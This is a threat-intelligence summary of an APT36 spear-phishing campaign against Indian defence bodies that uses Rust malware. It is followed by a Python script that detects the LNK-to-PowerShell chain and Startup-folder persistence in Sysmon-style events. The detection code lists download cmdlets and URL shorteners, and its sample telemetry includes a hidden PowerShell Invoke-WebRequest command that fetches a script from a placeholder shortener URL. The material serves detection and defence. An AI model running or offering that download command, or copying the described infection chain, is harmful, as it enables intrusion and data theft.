According to a Seqrite report released on 21 December 2023, Indian government entities, particularly those engaged in defence, have been targeted since October 2023 with novel malware written in Rust.
The delivery mechanism is consistent with spear-phishing, using documents and lures that mimic various Indian government agencies, especially defence-related branches. The observed attachment is a Windows shortcut (LNK) file named “IPR_2023-24” disguised as a PDF.
Upon opening the malicious shortcut file, PowerShell is launched to download and execute a script from the link shortener rb[.]gy using Invoke-WebRequest. This PowerShell script establishes URL paths for the subsequent stage payloads and drops a decoy PDF file in the Documents folder. When this decoy PDF file is accessed, it triggers the extraction of an archive containing a Rust-compiled binary with the EXE extension. That binary checks basic system information and then uploads logs to a counterfeit domain.
Persistence for the final payload is established through the Startup directory; that payload is another Rust-based malware whose objective is to steal files, collect system information, and upload both individual files and logs to a specified domain.
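The chain above (a double-clicked shortcut spawning PowerShell that fetches from a URL shortener, followed by a payload dropped into the Startup folder) is the kind of behaviour a hunt query can surface without any file hashes. The following is an added detection example, not code from the Seqrite report: it runs two simple rules over constructed Sysmon-style process-creation (Event ID 1) and file-creation (Event ID 11) records. The sample events, paths and the `https://rb.gy/EXAMPLE` placeholder URL are constructed; the shortener list beyond rb.gy and the set of user-facing parent processes are assumptions chosen for illustration.

```python
"""Added detection example (not from the report): flag the APT36-style chain
LNK -> PowerShell Invoke-WebRequest to a URL shortener -> Startup-folder
persistence in Sysmon-like records. All sample telemetry below is constructed."""
import re
from typing import Iterable

# rb.gy appears in the report; the other shorteners are an assumption added
# here so the rule is not tied to a single host.
SHORTENER_DOMAINS = {"rb.gy", "bit.ly", "tinyurl.com", "t.co"}

# Invoke-WebRequest / Invoke-RestMethod and their built-in PowerShell aliases.
DOWNLOAD_CMDLETS = re.compile(
    r"\b(invoke-webrequest|iwr|curl|wget|invoke-restmethod|irm)\b", re.I)
URL_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)
STARTUP_DIR = re.compile(r"\\microsoft\\windows\\start menu\\programs\\startup\\", re.I)
# Parents that indicate a user action (explorer.exe launches a double-clicked
# .lnk); service hosts and scheduled tasks are deliberately excluded. Assumption.
USER_FACING_PARENTS = {"explorer.exe", "winword.exe", "excel.exe", "outlook.exe"}


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def powershell_download_from_shortener(event: dict) -> bool:
    """Event ID 1: PowerShell spawned by a user-facing parent whose command
    line fetches content from a URL-shortener host."""
    if event.get("EventId") != 1:
        return False
    if _basename(event.get("Image", "")) not in {"powershell.exe", "pwsh.exe"}:
        return False
    if _basename(event.get("ParentImage", "")) not in USER_FACING_PARENTS:
        return False
    cmd = event.get("CommandLine", "")
    if not DOWNLOAD_CMDLETS.search(cmd):
        return False
    hosts = {h.lower() for h in URL_RE.findall(cmd)}
    return bool(hosts & SHORTENER_DOMAINS)


def startup_folder_persistence(event: dict) -> bool:
    """Event ID 11: an executable or shortcut written into a per-user or
    all-users Startup folder, as used for the final-stage payload."""
    if event.get("EventId") != 11:
        return False
    target = event.get("TargetFilename", "")
    return bool(STARTUP_DIR.search(target)) and \
        target.lower().endswith((".exe", ".lnk", ".bat", ".vbs"))


def triage(events: Iterable[dict]) -> list:
    """Return (rule_name, event) pairs for every event matching a rule."""
    findings = []
    for ev in events:
        if powershell_download_from_shortener(ev):
            findings.append(("powershell_download_from_shortener", ev))
        if startup_folder_persistence(ev):
            findings.append(("startup_folder_persistence", ev))
    return findings


# Constructed sample telemetry; hosts, paths and user names are placeholders.
SAMPLE_EVENTS = [
    {"EventId": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell.exe -w hidden -c "Invoke-WebRequest -Uri '
                    r'https://rb.gy/EXAMPLE -OutFile $env:TEMP\s.ps1"'},
    {"EventId": 1,  # benign admin script started by a service: must not fire
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\Inventory\collect.ps1"},
    {"EventId": 11,
     "Image": r"C:\Users\user\AppData\Local\Temp\stage.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"},
    {"EventId": 11,  # the decoy PDF landing in Documents: no rule should fire
     "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\user\Documents\IPR_2023-24.pdf"},
]

if __name__ == "__main__":
    for rule, ev in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {ev.get('CommandLine') or ev.get('TargetFilename')}")
```

Both rules key on behaviour the report describes rather than on indicators that change between campaigns: the parent/child relationship plus a download cmdlet aimed at a shortener, and a file of an executable type appearing in a Startup folder. In a real SIEM the same logic maps onto a process-creation query joined with a file-creation query on the same host within a short window, which also catches the case where the two stages are hours apart.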
Based on overlap in victimology and TTPs, the campaign has been attributed to APT36, a threat actor believed to be sponsored by the Pakistani government that primarily targets Indian government entities.